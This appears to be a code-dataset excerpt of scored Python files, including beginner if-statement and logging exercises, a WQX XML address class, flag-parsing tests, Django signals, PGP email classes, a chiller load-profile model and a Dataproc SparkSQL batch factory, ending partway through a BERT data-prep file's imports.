max_stars_repo_path (string, length 3 to 269) | max_stars_repo_name (string, length 4 to 119) | max_stars_count (int64, 0 to 191k) | id (string, length 1 to 7) | content (string, length 6 to 1.05M) | score (float64, 0.23 to 5.13) | int_score (int64, 0 to 5) |
---|---|---|---|---|---|---|
Python/python-practice/chapter5-if/toppints.py | jiaoqiyuan/Tests | 0 | 12796551 | <filename>Python/python-practice/chapter5-if/toppints.py
requested_topping = 'mushrooms'
if requested_topping != 'anchovies':
print("Hold the anchovies!")
answer = 17
if answer != 42:
print("That is not the correct answer. Please try again!")
requested_toppings = ['mushrooms', 'extra cheese']
if 'mushrooms' in requested_toppings:
print("Adding mushrooms.")
if 'pepperoni' in requested_toppings:
print("Adding pepperoni.")
if 'extra cheese' in requested_toppings:
print("Adding extra cheese.")
print("\nFinished making you pizza!")
requested_toppings = ['mushrooms', 'green peppers', 'extra cheese']
for requested_topping in requested_toppings:
if requested_topping == 'green peppers':
print("Sorry, we are out of green peppers fight now.")
else:
print("Adding " + requested_topping + ".")
print("\nFinished making your pizza!")
requested_toppings = []
if requested_toppings:
for requested_topping in requested_toppings:
print("Adding " + requested_topping + ".")
print("\nFinished making your pizza!")
else:
print("Are you sure you want a pizza?")
available_toppings = ['mushrooms', 'olives', 'green peppers', 'pepperoni', 'pineapple', 'extra cheese']
requested_toppings = ['mushrooms', 'french fries', 'extra cheese']
for requested_topping in requested_toppings:
if requested_topping in available_toppings:
print("Adding " + requested_topping + ".")
else:
print("Sorry, we don't have " + requested_topping + ".")
print("\nFinished making your pizza!") | 4.375 | 4 |
tools/initialcompdata/abundngc5286.py | lukeshingles/evelchemevol | 2 | 12796552 | from abundsolar import elsolarlogepsilon
zfactor = 10 ** -1.92
# mean of s-poor population in NGC5286
# from Marino et al. (2015) 2015MNRAS.450..815M
# [Fe/H] = -1.92
# log X/Fe = [X/Fe] + log(X/Fe)_solar
targetlogxtofe = { 'o': 0.58 + elsolarlogepsilon['o'] - elsolarlogepsilon['fe'],
'na': 0.18 + elsolarlogepsilon['na'] - elsolarlogepsilon['fe'],
'y': -0.04 + elsolarlogepsilon['y'] - elsolarlogepsilon['fe'],
'zr': 0.17 + elsolarlogepsilon['zr'] - elsolarlogepsilon['fe'],
'ba': 0.03 + elsolarlogepsilon['ba'] - elsolarlogepsilon['fe'],
'la': 0.29 + elsolarlogepsilon['la'] - elsolarlogepsilon['fe'],
'ce': 0.24 + elsolarlogepsilon['ce'] - elsolarlogepsilon['fe'],
'pr': 0.38 + elsolarlogepsilon['pr'] - elsolarlogepsilon['fe'],
'nd': 0.20 + elsolarlogepsilon['nd'] - elsolarlogepsilon['fe']
}
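# Illustrative reading of one entry (numbers here are hypothetical, not taken from
# abundsolar): if the solar log-epsilon abundances were log eps(O) = 8.69 and
# log eps(Fe) = 7.50, then targetlogxtofe['o'] = 0.58 + 8.69 - 7.50 = 1.77, i.e.
# log(O/Fe) for the s-poor population; zfactor = 10**-1.92 separately scales the
# overall metallicity to [Fe/H] = -1.92.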
| 1.875 | 2 |
log/basic_log.py | nkzmsb/howto | 0 | 12796553 | <filename>log/basic_log.py
import time
# print("===start: not use logging===")
# # Set the log level
# MODE = "INFO"
# for i in range(5): # simulate an arbitrary loop
# # simulate some arbitrary work and processing time
# a = i
# b = i * 2
# c = a + b
# time.sleep(1)
#
# if MODE == "DEBUG" or MODE == "INFO":
# print("a:{}, b:{}".format(a,b))
# if MODE == "INFO":
# print("c:{}".format(c))
print("===start: use logging===")
import logging
# Set the log level
logging.basicConfig(level=logging.DEBUG
, filename="log/basic_log.log" # This kwarg is not necessary when displaying information on the screen
)
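# (Optional sketch, not part of the original script: to write to both the screen
# and the file at the same time, you could pass handlers instead of filename, e.g.
# logging.basicConfig(level=logging.DEBUG,
#                     handlers=[logging.StreamHandler(),
#                               logging.FileHandler("log/basic_log.log")]))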
for i in range(5): # simulate an arbitrary loop
# simulate some arbitrary work and processing time
a = i
b = i * 2
c = a + b
time.sleep(1)
# DEBUG-level output
logging.debug("a:{}, b:{}".format(a,b))
# INFO-level output
logging.info("c:{}".format(c)) | 3.71875 | 4 |
wqxlib/wqx_v3_0/OrganizationAddress.py | FlippingBinary/wqxlib-python | 0 | 12796554 | from yattag import Doc
from .SimpleContent import (
AddressText,
AddressTypeName,
CountryCode,
CountyCode,
LocalityName,
PostalCode,
StateCode,
SupplementalAddressText,
)
class OrganizationAddress:
"""
The physical address of an organization.
"""
__addressTypeName: AddressTypeName
__addressText: AddressText
__supplementalAddressText: SupplementalAddressText
__localityName: LocalityName
__stateCode: StateCode
__postalCode: PostalCode
__countryCode: CountryCode
__countyCode: CountyCode
def __init__(
self,
o: dict = None,
*,
addressTypeName: AddressTypeName = None,
addressText: AddressText = None,
supplementalAddressText: SupplementalAddressText = None,
localityName: LocalityName = None,
stateCode: StateCode = None,
postalCode: PostalCode = None,
countryCode: CountryCode = None,
countyCode: CountyCode = None
):
if isinstance(o, OrganizationAddress):
# Assign attributes from object without typechecking
self.__addressTypeName = o.addressTypeName
self.__addressText = o.addressText
self.__supplementalAddressText = o.supplementalAddressText
self.__localityName = o.localityName
self.__stateCode = o.stateCode
self.__postalCode = o.postalCode
self.__countryCode = o.countryCode
self.__countyCode = o.countyCode
elif isinstance(o, dict):
# Assign attributes from dictionary with typechecking
self.addressTypeName = o.get("addressTypeName")
self.addressText = o.get("addressText")
self.supplementalAddressText = o.get("supplementalAddressText")
self.localityName = o.get("localityName")
self.stateCode = o.get("stateCode")
self.postalCode = o.get("postalCode")
self.countryCode = o.get("countryCode")
self.countyCode = o.get("countyCode")
else:
# Assign attributes from named keywords with typechecking
self.addressTypeName = addressTypeName
self.addressText = addressText
self.supplementalAddressText = supplementalAddressText
self.localityName = localityName
self.stateCode = stateCode
self.postalCode = postalCode
self.countryCode = countryCode
self.countyCode = countyCode
@property
def addressTypeName(self) -> AddressTypeName:
return self.__addressTypeName
@addressTypeName.setter
def addressTypeName(self, val: AddressTypeName) -> None:
self.__addressTypeName = None if val is None else AddressTypeName(val)
@property
def addressText(self) -> AddressText:
return self.__addressText
@addressText.setter
def addressText(self, val: AddressText) -> None:
self.__addressText = None if val is None else AddressText(val)
@property
def supplementalAddressText(self) -> SupplementalAddressText:
return self.__supplementalAddressText
@supplementalAddressText.setter
def supplementalAddressText(self, val: SupplementalAddressText) -> None:
self.__supplementalAddressText = (
None if val is None else SupplementalAddressText(val)
)
@property
def localityName(self) -> LocalityName:
return self.__localityName
@localityName.setter
def localityName(self, val: LocalityName) -> None:
self.__localityName = None if val is None else LocalityName(val)
@property
def stateCode(self) -> StateCode:
return self.__stateCode
@stateCode.setter
def stateCode(self, val: StateCode) -> None:
self.__stateCode = None if val is None else StateCode(val)
@property
def postalCode(self) -> PostalCode:
return self.__postalCode
@postalCode.setter
def postalCode(self, val: PostalCode) -> None:
self.__postalCode = None if val is None else PostalCode(val)
@property
def countryCode(self) -> CountryCode:
return self.__countryCode
@countryCode.setter
def countryCode(self, val: CountryCode) -> None:
self.__countryCode = None if val is None else CountryCode(val)
@property
def countyCode(self) -> CountyCode:
return self.__countyCode
@countyCode.setter
def countyCode(self, val: CountyCode) -> None:
self.__countyCode = None if val is None else CountyCode(val)
def generateXML(self, name: str = "OrganizationAddress") -> str:
doc = Doc()
line = doc.line
tag = doc.tag
with tag(name):
if self.__addressTypeName is not None:
line("AddressTypeName", self.__addressTypeName)
if self.__addressText is not None:
line("AddressText", self.__addressText)
if self.__supplementalAddressText is not None:
line("SupplementalAddressText", self.__supplementalAddressText)
if self.__localityName is not None:
line("LocalityName", self.__localityName)
if self.__stateCode is not None:
line("StateCode", self.__stateCode)
if self.__postalCode is not None:
line("PostalCode", self.__postalCode)
if self.__countryCode is not None:
line("CountryCode", self.__countryCode)
if self.__countyCode is not None:
line("CountyCode", self.__countyCode)
return doc.getvalue()
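# Minimal usage sketch (not part of the original module); it assumes the
# SimpleContent types accept plain strings, and the field values below are made up.
if __name__ == "__main__":
    example = OrganizationAddress(
        addressTypeName="Mailing",
        addressText="123 Main St",
        localityName="Springfield",
        stateCode="VA",
        postalCode="12345",
    )
    print(example.generateXML())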
| 2.765625 | 3 |
tests/flag_test.py | harrybrwn/dispatch | 0 | 12796555 | <filename>tests/flag_test.py
import pytest
from pytest import raises
import sys
from os.path import dirname
sys.path.insert(0, dirname(dirname(__file__)))
from typing import List, Set, Dict, Sequence, Mapping
from dispatch import command
from dispatch.flags import Option, _from_typing_module, _is_iterable
class AType:
def __init__(self, val):
self.val = val
def testTypeParsing():
o = Option('o', List[int])
o.setval('[1,2,3,4]')
assert isinstance(o.value, list)
for got, want in zip(o.value, [1, 2, 3, 4]):
assert isinstance(got, int)
assert isinstance(want, int)
assert got == want
o = Option('o', list)
o.setval('[1,2,3,4]')
assert isinstance(o.value, list)
for got, want in zip(o.value, [1, 2, 3, 4]):
assert isinstance(got, str)
assert isinstance(want, int)
assert int(got) == want
assert got == str(want)
o = Option('o', Set[float])
o.setval('[1.5,2.6,3.7,4.8]')
assert isinstance(o.value, set)
for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]):
assert isinstance(got, float)
assert isinstance(want, float)
assert got == want
assert got == want
o = Option('o', Dict[str, int])
o.setval('{one:1,two:2,three:3}')
assert isinstance(o.value, dict)
for k, v in o.value.items():
assert isinstance(k, str)
assert isinstance(v, int)
opt = Option('num', complex)
opt.setval('5+9j')
assert opt.value == complex(5, 9)
opt.setval(complex(7, 2))
assert opt.value == complex(7, 2)
opt.setval(6.7)
assert opt.value == complex(6.7, 0)
opt = Option('type', AType)
opt.setval('hello')
assert isinstance(opt.value, AType)
assert opt.value.val == 'hello'
def testBadTypeParsing():
o = Option('outout', Dict[str, float])
opt = Option('num', complex)
@command
def f(keys: Dict[str, float]):
pass
with raises(ValueError):
o.setval('{one:1.0,two:2.5,three:the third number,four:4}')
opt.setval('4+3i')
f(['--keys', '{one:1,two:this is the number two}'])
def testIsIterable():
assert _is_iterable(str)
assert _is_iterable(list)
assert _is_iterable(dict)
assert _is_iterable(set)
assert _is_iterable(List)
assert _is_iterable(Dict)
assert _is_iterable(Sequence)
assert _is_iterable(Mapping)
class A: pass # noqa
assert not _is_iterable(int)
assert not _is_iterable(float)
assert not _is_iterable(A)
assert _is_iterable([1, 2, 3])
def testFromTypingModule():
assert _from_typing_module(List)
assert _from_typing_module(Sequence)
assert _from_typing_module(Dict[int, str])
assert not _from_typing_module(list)
assert not _from_typing_module(int)
assert not _from_typing_module(dict)
class A: pass # noqa
assert not _from_typing_module(A)
| 2.71875 | 3 |
JellyBot/api/ar/__init__.py | RaenonX/Jelly-Bot-API | 5 | 12796556 | from .add import AutoReplyAddView, AutoReplyAddExecodeView
from .validate import ContentValidationView
from .tag import AutoReplyTagPopularityQueryView
| 0.902344 | 1 |
tests/test_filename.py | mverbowski/beets-copyartifacts | 0 | 12796557 | import os
import sys
from helper import CopyArtifactsTestCase
from beets import config
class CopyArtifactsFilename(CopyArtifactsTestCase):
"""
Tests to check handling of artifacts with filenames containing unicode characters
"""
def setUp(self):
super(CopyArtifactsFilename, self).setUp()
self._set_import_dir()
self.album_path = os.path.join(self.import_dir, 'the_album')
os.makedirs(self.album_path)
self._setup_import_session(autotag=False)
config['copyartifacts']['extensions'] = '.file'
def test_import_dir_with_unicode_character_in_artifact_name_copy(self):
open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')
def test_import_dir_with_unicode_character_in_artifact_name_move(self):
config['import']['move'] = True
open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')
def test_import_dir_with_illegal_character_in_album_name(self):
config['paths']['ext:file'] = unicode('$albumpath/$artist - $album')
# Create import directory, illegal filename character used in the album name
open(os.path.join(self.album_path, u'artifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'),
'full.mp3',
'Tag Album?')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist - Tag Album_.file')
| 2.609375 | 3 |
jina_commons/logging.py | chuangfengwang/jina-commons | 5 | 12796558 | import functools
import os
import time
from typing import List
from jina import DocumentArray
from jina.logging.logger import JinaLogger
from jina.enums import LogVerbosity
def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]:
non_empty_fields = list(docs[0].non_empty_fields)
for doc in docs[1:]:
for field in list(non_empty_fields):
if field not in doc.non_empty_fields:
non_empty_fields.remove(field)
return non_empty_fields
def add_request_logger(logger):
"""
Add logging functionality to a request function.
Only shows logs for `JINA_LOG_LEVEL` > info.
You can set this as an env variable before starting your `Jina` application.
Example usages:
>>> from jina import Executor, requests
>>> my_logger = JinaLogger('MyExecLogger')
>>>
>>> class MyExec(Executor):
>>> @requests
>>> @add_request_logger(my_logger)
>>> def index(self, docs, parameters, **kwargs):
>>> ...
:param logger: The logger you want to use
"""
def decorator(function):
@functools.wraps(function)
def wrapper(self, docs, parameters, **kwargs):
verbose_level = os.environ.get('JINA_LOG_LEVEL', None)
verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None
if verbose_level is None or verbose_level > LogVerbosity.DEBUG:
return function(self, docs, parameters, **kwargs)
if not docs:
logger.debug('Docs is None. Nothing to monitor')
return function(self, docs, parameters, **kwargs)
logger.debug(f'📄 Received request containing {len(docs)} documents.')
logger.debug(f'📕 Received parameters dictionary: {parameters}')
if len(docs) > 0:
non_empty_fields = _get_non_empty_fields_doc_array(docs)
logger.debug(f'🏷 Non-empty fields {non_empty_fields}')
start_time = time.time()
result = function(self, docs, parameters, **kwargs)
end_time = time.time()
logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.')
return result
return wrapper
return decorator
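# Reminder (sketch): the debug output above only appears when the environment
# variable is set before the app starts, e.g. from the shell:
#   JINA_LOG_LEVEL=DEBUG python app.py   # app.py is a placeholder for your entry point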
| 2.375 | 2 |
otscrape/core/extractor/file/file.py | SSripilaipong/otscrape | 0 | 12796559 | <gh_stars>0
from otscrape.core.base.extractor import Extractor
from otscrape.core.loader.file import LineObject
class FileContent(Extractor):
def __init__(self, target=None, *, project=True, replace_error=None, **kwargs):
super().__init__(target=target, project=project, replace_error=replace_error)
self.kwargs = kwargs
def extract(self, page, cache):
target = self.target
x = page[target]
assert isinstance(x, (LineObject,))
return x.content
class FileName(Extractor):
def __init__(self, target=None, *, project=True, replace_error=None, **kwargs):
super().__init__(target=target, project=project, replace_error=replace_error)
self.kwargs = kwargs
def extract(self, page, cache):
target = self.target
x = page[target]
assert isinstance(x, (LineObject,))
return x.filename
| 2.3125 | 2 |
kungfucms/apps/account/signals.py | youngershen/kungfucms | 0 | 12796560 | # PROJECT : kungfucms
# TIME : 2020/6/9 12:54
# AUTHOR : <NAME>
# EMAIL : <EMAIL>
# PHONE : 13811754531
# WECHAT : 13811754531
# https://github.com/youngershen
from django.core.signals import request_started, \
request_finished
from django.dispatch import Signal, receiver
before_sign_in = Signal(providing_args=["toppings", "size"])
after_sign_in = Signal(providing_args=["toppings", "size"])
sign_in_post_permission = Signal(providing_args=["toppings", "size"])
@receiver(request_started)
def before_request(sender, **kwargs):
pass
@receiver(request_finished)
def after_request(sender, **kwargs):
pass
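# Usage sketch (hypothetical receiver and send site, not part of this module):
#
# @receiver(before_sign_in)
# def on_before_sign_in(sender, **kwargs):
#     pass
#
# # e.g. in a sign-in view, before authenticating:
# before_sign_in.send(sender=None, toppings=None, size=None)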
| 1.929688 | 2 |
Topics/Algorithms in Python/Last index of max/main.py | soukalli/jetbrain-accademy | 0 | 12796561 | def last_indexof_max(numbers):
# write the modified algorithm here
index = 0
for i in range(len(numbers)):
if numbers[i] >= numbers[index]:
index = i
return index
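# Illustrative check (not part of the exercise): the maximum value 3 appears at
# indices 1 and 3, and the rightmost occurrence wins because of the >= comparison:
# last_indexof_max([1, 3, 2, 3])  # -> 3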
| 3.890625 | 4 |
aula2/exercicio2.py | ArseniumGX/bluemer-modulo1-python | 0 | 12796562 | <filename>aula2/exercicio2.py
""" 02 - Qual o valor do troco?
Defina uma variável para o valor de uma compra que custou R$100,98;
Defina uma variável para o valor que o cliente pagou R$150,00;
Defina uma variável que calcula o valor do troco e exiba-o no console com o valor final arredondado.
"""
valor_compra = 100.98
valor_pago = 150.00
troco = valor_pago - valor_compra
print(f'Your change is: R$ {troco:.2f}')
| 2.984375 | 3 |
model/contact.py | dmi-vor/python_training | 0 | 12796563 | <reponame>dmi-vor/python_training<gh_stars>0
from sys import maxsize
class Contact:
def __init__(self, firstname=None, middlename=None, lastname=None, id=None,
nickname=None, title=None, company=None, address=None,
homephone=None, mobilephone=None, workphone=None, fax=None,
email_1=None, email_2=None, email_3=None, homepage=None,
address_2=None, homephone2=None, notes=None, all_emails_from_homepage=None, all_phones_from_homepage=None):
self.firstname = firstname
self.middlename = middlename
self.lastname = lastname
self.nickname = nickname
self.title = title
self.company = company
self.address = address
self.homephone = homephone
self.mobilephone = mobilephone
self.workphone = workphone
self.fax = fax
self.email_1 = email_1
self.email_2 = email_2
self.email_3 = email_3
self.homepage = homepage
self.address_2 = address_2
self.homephone2 = homephone2
self.notes = notes
self.all_emails_from_homepage = all_emails_from_homepage
self.all_phones_from_homepage = all_phones_from_homepage
self.id = id
def __repr__(self):
return "%s:%s:%s" % (self.id, self.firstname, self.lastname)
def __eq__(self, other):
return (self.id is None or other.id is None or self.id == other.id) and self.lastname == other.lastname and self.firstname == other.firstname
def id_or_max(self):
if self.id:
return int(self.id)
else:
return maxsize
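# Typical usage sketch (not part of the original model): sort contact lists before
# comparing them, so contacts without an id (id_or_max == maxsize) end up last:
# sorted(contact_list, key=Contact.id_or_max)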
| 2.765625 | 3 |
reo/src/load_profile_chiller_thermal.py | akuam1/REopt_Lite_API | 0 | 12796564 | <reponame>akuam1/REopt_Lite_API<gh_stars>0
from reo.src.load_profile import BuiltInProfile
import os
import json
import pandas as pd
import numpy as np
from datetime import datetime
from reo.utilities import TONHOUR_TO_KWHT
class LoadProfileChillerThermal(BuiltInProfile):
"""
Chiller Load Profiles based on CRB defined load shapes or user-defined input
"""
with open(os.path.join(BuiltInProfile.library_path, 'reference_cooling_kwh.json'), 'r') as f:
annual_loads = json.loads(f.read())
builtin_profile_prefix = "Cooling8760_norm_"
electric_chiller_cop_defaults = { "convert_elec_to_thermal": 4.55,
"less_than_100_tons": 4.40,
"greater_than_100_tons": 4.69}
@staticmethod
def get_default_cop(max_thermal_factor_on_peak_load, max_kw=None, max_kwt=None, max_ton=None):
if max_ton is not None:
max_cooling_load_tons = max_ton
elif max_kwt is not None:
max_cooling_load_tons = max_kwt / TONHOUR_TO_KWHT
elif max_kw is not None:
max_cooling_load_tons = max_kw / TONHOUR_TO_KWHT * \
LoadProfileChillerThermal.electric_chiller_cop_defaults["convert_elec_to_thermal"]
else:
raise Exception("Please supply a max_ton, max_kwt or max_kw value")
estimated_max_chiller_thermal_capacity_tons = max_cooling_load_tons * max_thermal_factor_on_peak_load
if estimated_max_chiller_thermal_capacity_tons < 100.0:
return LoadProfileChillerThermal.electric_chiller_cop_defaults["less_than_100_tons"]
else:
return LoadProfileChillerThermal.electric_chiller_cop_defaults["greater_than_100_tons"]
def __init__(self, dfm=None, total_electric_load_list=[], latitude=None, longitude=None, nearest_city=None,
time_steps_per_hour=None, year=None, chiller_cop=None, max_thermal_factor_on_peak_load=None, **kwargs):
"""
:param dfm: (object) data_manager to which this load object will be added
:param total_electric_load_list: (array) electric LoadProfile object resulting from parsed inputs
:param latitude: (float) site latitude
:param longitude: (float) site longitude
:param nearest_city: (str) site nearest_city
:param time_steps_per_hour: (int) simulation time resolution
:param year: (int) electric LoadProfile year
:param chiller_cop: (float or int) Coefficient of Performance for Chiller
:param max_thermal_factor_on_peak_load: (float or int) maximum thermal factor on peak load for the Chiller
:param kwargs: (dict) Chiller specific inputs as defined in reo/nested_inputs
"""
self.nearest_city = nearest_city
self.latitude = latitude
self.longitude = longitude
self.time_steps_per_hour = time_steps_per_hour
self.year = year
# Default electric_load_list to None, used later to see if we need to convert kWh to kWht
electric_load_list = None
# Use the highest resolution/quality input first
if kwargs.get('loads_ton') is not None:
self.load_list = [i*TONHOUR_TO_KWHT for i in kwargs['loads_ton']]
# DOE Reference building profile are used if there is a reference name provided
elif kwargs.get('doe_reference_name'):
doe_reference_name = kwargs.get('doe_reference_name') or []
combine_loadlist = []
for i in range(len(doe_reference_name)):
# Monthly loads can only be used to scale a non-hybrid profile
kwargs['monthly_totals_energy'] = kwargs.get("monthly_tonhour")
if len(doe_reference_name)>1:
kwargs['monthly_totals_energy'] = None
kwargs['annual_energy'] = None
# Annual loads are used in place of percent shares if provided
if kwargs.get("annual_tonhour") is not None:
kwargs['annual_energy'] = kwargs["annual_tonhour"]
kwargs['annual_loads'] = self.annual_loads
kwargs['builtin_profile_prefix'] = self.builtin_profile_prefix
kwargs['latitude'] = latitude
kwargs['longitude'] = longitude
kwargs['doe_reference_name'] = doe_reference_name[i]
kwargs['nearest_city'] = nearest_city
kwargs['time_steps_per_hour'] = time_steps_per_hour
kwargs['year'] = year
super(LoadProfileChillerThermal, self).__init__(**kwargs)
if time_steps_per_hour > 1:
partial_load_list = np.concatenate([[x] * time_steps_per_hour \
for x in self.built_in_profile])
else:
partial_load_list = self.built_in_profile
combine_loadlist.append(list(partial_load_list))
# In the case where the user supplies a list of doe_reference_names and percent shares
# for consistency we want to act as if we had scaled the partial load to the total site
# load which was unknown at the start of the loop above. This scalar makes it such that
# when the percent shares are later applied that the total site load will be the sum
# of the default annual loads for this location
if (len(doe_reference_name) > 1) and kwargs['annual_energy'] is None:
total_site_load = sum([sum(l) for l in combine_loadlist])
for i, load in enumerate(combine_loadlist):
actual_percent_of_site_load = sum(load)/total_site_load
scalar = 1.0 / actual_percent_of_site_load
combine_loadlist[i] = list(np.array(load)* scalar)
#Apply the percent share of annual load to each partial load
if (len(doe_reference_name) > 1):
for i, load in enumerate(combine_loadlist):
combine_loadlist[i] = list(np.array(load) * (kwargs.get("percent_share")[i]/100.0))
# Aggregate total hybrid load
hybrid_loadlist = list(np.sum(np.array(combine_loadlist), 0))
if (kwargs.get("annual_tonhour") is not None) or (kwargs.get("monthly_tonhour") is not None):
#load_list is always expected to be in units of kWt
self.load_list = [i*TONHOUR_TO_KWHT for i in hybrid_loadlist]
else:
electric_load_list = hybrid_loadlist
# If no doe_reference_name or loads_ton provided, scale by a fraction of electric load
elif kwargs.get('loads_fraction') is not None:
electric_load_list = list(np.array(kwargs['loads_fraction']) * np.array(total_electric_load_list))
elif kwargs.get('monthly_fraction') is not None:
month_series = pd.date_range(datetime(year,1,1), datetime(year+1,1,1), periods=8760*time_steps_per_hour)
electric_load_list = [total_electric_load_list[i] * kwargs['monthly_fraction'][month-1] \
for i, month in enumerate(month_series.month)]
elif kwargs.get('annual_fraction') is not None:
electric_load_list = [kwargs['annual_fraction'] * kw for kw in total_electric_load_list]
#Calculate COP based on kwth load or kw load (if not user-entered)
self.chiller_cop = chiller_cop
# Update COP based on estimated max chiller load
if self.chiller_cop is None:
if electric_load_list is not None:
#This is a static method so it can be accessible in views.py
self.chiller_cop = LoadProfileChillerThermal.get_default_cop(
max_kw=max(electric_load_list),
max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)
else:
#This is a static method so it can be accessible in views.py
self.chiller_cop = LoadProfileChillerThermal.get_default_cop(
max_kwt=max(self.load_list),
max_thermal_factor_on_peak_load=max_thermal_factor_on_peak_load)
# load_list is always expected to be in units of kWth
if electric_load_list is not None:
self.load_list = [i*self.chiller_cop for i in electric_load_list]
self.annual_kwht = int(round(sum(self.load_list),0))
if dfm is not None:
dfm.add_load_chiller_thermal(self)
| 2.484375 | 2 |
ac/messagepgp.py | juga0/djac | 0 | 12796565 | <reponame>juga0/djac
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:expandtab
# Copyright 2017 juga (juga at riseup dot net), under MIT license.
"""Extend Django email classes for MIME multipart/pgp-encrypted
type messages.
"""
__all__ = ['EmailMessageEnc', 'EmailMessagePGP']
from django.conf import settings
from django.core.mail.message import (
EmailMessage, MIMEMixin,
forbid_multi_line_headers, force_text,
make_msgid, formatdate, DNS_NAME)
from emailpgp.mime.multipartpgp import MIMEMultipartPGP
from autocrypt.pgpymessage import gen_ac_header_dict
class SafeMIMEMultipart(MIMEMixin, MIMEMultipartPGP):
def __init__(self, _data=None, _subtype='encrypted', boundary=None,
encoding=None, **_params):
self.encoding = encoding
MIMEMultipartPGP.__init__(self, _data, boundary, **_params)
def __setitem__(self, name, val):
name, val = forbid_multi_line_headers(name, val, self.encoding)
MIMEMultipartPGP.__setitem__(self, name, val)
class EmailMessageEnc(EmailMessage):
def message(self, msg):
self.msg = msg
class EmailMessagePGP(EmailMessage):
"""A container for encrypted email information."""
content_subtype = 'encrypted'
mixed_subtype = ''
def message(self):
encoding = self.encoding or settings.DEFAULT_CHARSET
msg = MIMEMultipartPGP(self.body)
# FIXME: attachments
# msg = self._create_message(msg)
msg['Subject'] = self.subject
msg['From'] = self.extra_headers.get('From', self.from_email)
msg['To'] = self.extra_headers.get('To', ', '.join(map(force_text, self.to)))
if self.cc:
msg['Cc'] = ', '.join(map(force_text, self.cc))
if self.reply_to:
msg['Reply-To'] = self.extra_headers.get(
'Reply-To', ', '.join(map(force_text, self.reply_to)))
# Email header names are case-insensitive (RFC 2045), so we have to
# accommodate that when doing comparisons.
header_names = [key.lower() for key in self.extra_headers]
if 'date' not in header_names:
# formatdate() uses stdlib methods to format the date, which use
# the stdlib/OS concept of a timezone, however, Django sets the
# TZ environment variable based on the TIME_ZONE setting which
# will get picked up by formatdate().
msg['Date'] = formatdate(localtime=settings.EMAIL_USE_LOCALTIME)
if 'message-id' not in header_names:
# Use cached DNS_NAME for performance
msg['Message-ID'] = make_msgid(domain=DNS_NAME)
for name, value in self.extra_headers.items():
# From and To are already handled
if name.lower() in ('from', 'to'):
continue
msg[name] = value
return msg
class EmailMessagePGPAC(EmailMessagePGP):
def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
connection=None, attachments=None, headers=None, cc=None,
reply_to=None, keydata=None, pe=None):
super(EmailMessagePGPAC, self).__init__(
subject, body, from_email, to, bcc, connection, attachments,
headers, cc, reply_to)
self.extra_headers.update(gen_ac_header_dict(to, keydata, pe))
| 2.140625 | 2 |
lib/googlecloudsdk/command_lib/dataproc/batches/sparksql_batch_factory.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2 | 12796566 | # -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory class for SparkSqlBatch message."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from apitools.base.py import encoding
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.dataproc import local_file_uploader
class SparkSqlBatchFactory(object):
"""Factory class for SparkSqlBatch message."""
def __init__(self, dataproc):
"""Factory class for SparkSqlBatch message.
Args:
dataproc: A Dataproc instance.
"""
self.dataproc = dataproc
def UploadLocalFilesAndGetMessage(self, args):
"""Uploads local files and creates a SparkSqlBatch message.
Uploads user local files and change the URIs to local files to uploaded
URIs.
Creates a SparkSqlBatch message.
Args:
args: Parsed arguments.
Returns:
A SparkSqlBatch message instance.
Raises:
AttributeError: Bucket is required to upload local files, but not
specified.
"""
kwargs = {}
dependencies = {}
# Upload requires a list.
dependencies['queryFileUri'] = [args.SQL_SCRIPT]
if args.jar_files:
dependencies['jarFileUris'] = args.jar_files
if args.jars:
dependencies['jarFileUris'] = args.jars
params = None
if args.script_variables:
params = args.script_variables
elif args.vars:
params = args.vars
if params:
kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage(
params,
self.dataproc.messages.SparkSqlBatch.QueryVariablesValue,
sort_items=True)
if local_file_uploader.HasLocalFiles(dependencies):
bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket
if not bucket:
raise AttributeError('--deps-bucket was not specified.')
dependencies = local_file_uploader.Upload(bucket, dependencies)
# Move main SQL script out of the list.
dependencies['queryFileUri'] = dependencies['queryFileUri'][0]
# Merge the dictionaries first for compatibility.
kwargs.update(dependencies)
return self.dataproc.messages.SparkSqlBatch(**kwargs)
def AddArguments(parser):
flags.AddMainSqlScript(parser)
flags.AddJarFiles(parser)
flags.AddSqlScriptVariables(parser)
# Cloud Storage bucket to upload workload dependencies.
# It is required until we figure out a place to upload user files.
flags.AddBucket(parser)
| 2.125 | 2 |
data_prep_step/BERT_PYTORCH/data_prep_bert_pytorch.py | sampathkumaran90/pytorch-pipeline | 0 | 12796567 | <reponame>sampathkumaran90/pytorch-pipeline<filename>data_prep_step/BERT_PYTORCH/data_prep_bert_pytorch.py
import shutil
from collections import defaultdict
import numpy as np
import pandas as pd
import torch
import torch.nn.functional as F
from sklearn.model_selection import train_test_split
from torch import nn
from torch.utils.data import Dataset, DataLoader
from transformers import (
BertModel,
BertTokenizer,
AdamW
)
import argparse
import os
from tqdm import tqdm
import requests
